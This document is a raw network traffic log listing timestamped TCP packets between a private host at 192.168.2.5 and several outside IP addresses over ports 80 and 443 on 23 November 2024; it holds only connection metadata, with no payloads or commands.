                                                                                                                                                                          Nov 23, 2024 19:01:33.845530987 CET4434973713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:33.852613926 CET49732443192.168.2.5172.67.162.84
                                                                                                                                                                          Nov 23, 2024 19:01:33.852613926 CET49732443192.168.2.5172.67.162.84
                                                                                                                                                                          Nov 23, 2024 19:01:33.852688074 CET44349732172.67.162.84192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:34.668298960 CET44349732172.67.162.84192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:34.668370008 CET44349732172.67.162.84192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:34.668437004 CET49732443192.168.2.5172.67.162.84
                                                                                                                                                                          Nov 23, 2024 19:01:34.668644905 CET49732443192.168.2.5172.67.162.84
                                                                                                                                                                          Nov 23, 2024 19:01:34.668665886 CET44349732172.67.162.84192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:34.668675900 CET49732443192.168.2.5172.67.162.84
                                                                                                                                                                          Nov 23, 2024 19:01:34.668682098 CET44349732172.67.162.84192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:34.707988977 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:34.827776909 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:34.827898979 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:34.964699030 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:35.091084003 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.543704987 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.544639111 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:35.544680119 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.545325994 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:35.545334101 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.646317959 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.646791935 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:35.646816969 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.647356987 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:35.647362947 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.655677080 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.656002045 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:35.656021118 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.656553030 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:35.656558990 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.711838961 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.712199926 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:35.712228060 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.712759018 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:35.712766886 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.784109116 CET4434973713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.791847944 CET49737443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:35.791879892 CET4434973713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.792475939 CET49737443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:35.792480946 CET4434973713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.978732109 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.978883982 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.978981972 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:35.979212999 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:35.979229927 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.979239941 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:35.979243994 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.982577085 CET49739443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:35.982608080 CET4434973913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:35.982688904 CET49739443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:35.982842922 CET49739443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:35.982852936 CET4434973913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.092195988 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.092267036 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.092364073 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.092564106 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.092571974 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.092582941 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.092586994 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.096077919 CET49740443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.096190929 CET4434974013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.096349001 CET49740443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.096499920 CET49740443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.096537113 CET4434974013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.118807077 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.118985891 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.119121075 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.121016979 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.121064901 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.121092081 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.121109009 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.125421047 CET49741443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.125453949 CET4434974113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.125531912 CET49741443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.125663996 CET49741443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.125675917 CET4434974113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.167577982 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.167743921 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.167830944 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.168030977 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.168060064 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.168102026 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.168112040 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.170789957 CET49742443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.170829058 CET4434974213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.170933008 CET49742443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.171058893 CET49742443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.171087027 CET4434974213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.216425896 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.216494083 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.216526031 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.216603994 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.216830969 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.216886997 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.216917038 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.216923952 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.217616081 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.217672110 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.217684031 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.217700958 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.217761993 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.218355894 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.218413115 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.245913982 CET4434973713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.246290922 CET4434973713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.246371031 CET49737443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.246484995 CET49737443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.246484995 CET49737443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.246515989 CET4434973713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.246541977 CET4434973713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.248754025 CET49743443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.248785973 CET4434974313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.248864889 CET49743443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.249026060 CET49743443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:36.249037027 CET4434974313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.341346979 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.341450930 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.341516018 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.345737934 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.345803976 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.345999956 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.417737007 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.417795897 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.417859077 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.422017097 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.422204018 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.422259092 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.430690050 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.434071064 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.434257984 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.434319973 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.442703009 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.442815065 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.442862034 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.451489925 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.451561928 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.451571941 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.460356951 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.460429907 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.460510015 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.469098091 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.469266891 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.469346046 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.477863073 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.477983952 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.478066921 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.486572027 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.486677885 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.486762047 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.494246960 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.494302034 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.494368076 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.501672029 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.501724958 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.501796007 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.618860960 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.618969917 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.619081020 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.621335030 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.621469021 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.624931097 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.626277924 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.626369953 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.626427889 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.631226063 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.631407022 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.631480932 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.636159897 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.636214018 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.636280060 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.640909910 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.641066074 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.641146898 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.645689964 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.645795107 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.645865917 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.650454998 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.650511026 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.650576115 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.655240059 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.655277014 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.655349016 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.659955978 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.660052061 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.660113096 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.664742947 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.664859056 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.664923906 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.669523954 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.669641018 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.669706106 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.674252033 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.674395084 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.674464941 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.679020882 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.679153919 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.679233074 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.683783054 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.683943987 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.684006929 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.688560963 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.688688040 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.688740969 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.693295002 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.693411112 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.693460941 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.698064089 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.698164940 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.698225021 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.702838898 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.702960014 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.703011036 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.708014965 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.708144903 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.708199978 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.712328911 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.712450981 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.712524891 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.717120886 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.717191935 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.717247009 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.721827030 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.777393103 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.820319891 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.820480108 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.820611000 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.822499990 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.822660923 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.822731018 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.826880932 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.826917887 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.826987028 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.831018925 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.831175089 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.831244946 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.836222887 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.836256981 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.836319923 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.839801073 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.839965105 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.840032101 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.843895912 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.844027996 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.844091892 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.848253965 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.848407030 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.848467112 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.853287935 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.854648113 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.854707956 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.857054949 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.857198954 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.857259035 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.861319065 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.861471891 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.861526012 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.865684986 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.865720987 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.865777969 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.869918108 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.870085955 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.870146036 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.874317884 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.874353886 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.874407053 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.878643990 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.878679991 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.878742933 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.882854939 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.882890940 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.882945061 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.886632919 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.886719942 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.886770964 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.890605927 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.890717030 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.890790939 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.895479918 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.895519018 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.895569086 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.898572922 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.898653030 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.898708105 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.902565002 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.902663946 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.902714968 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.906541109 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.906692028 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.906754971 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.910511017 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.910620928 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:36.910681009 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.914459944 CET8049738185.215.113.16192.168.2.5
